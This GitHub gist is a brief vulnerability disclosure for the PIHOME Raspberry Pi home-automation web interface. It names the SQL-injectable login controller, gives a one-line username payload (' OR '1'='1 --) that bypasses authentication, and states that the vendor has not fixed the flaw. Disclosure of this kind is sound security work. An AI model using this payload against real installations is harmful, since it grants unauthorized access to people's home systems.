Skip to content

Instantly share code, notes, and snippets.

@xsuperbug

xsuperbug/PIHOME RaspberryPi - Home Automation

Last active November 11, 2015 15:33
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save xsuperbug/5b86a600df8fdd8dab74 to your computer and use it in GitHub Desktop.
Save xsuperbug/5b86a600df8fdd8dab74 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
PIHOME RaspberryPi - Home Automation
Name : PIHOME RaspberryPi - Home Automation
Vendor Homepage : http://pihome.harkemedia.de/
Vulnerability Type : Sql Injection
Researcher : Evren Yalçın <evren [at] superbug [dot] co>
Details :
1- Sql Injection :
Source Code:
https://github.com/cerosx/RPI.PIHome2.0-GUI-Frontend/blob/master/pihome/controllers/loginController.php#L45
Payload:
username : ' OR '1'='1 --
-----
6 October : Informed Vendor about Issue.
* : This issue didn't fix by the vendor.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment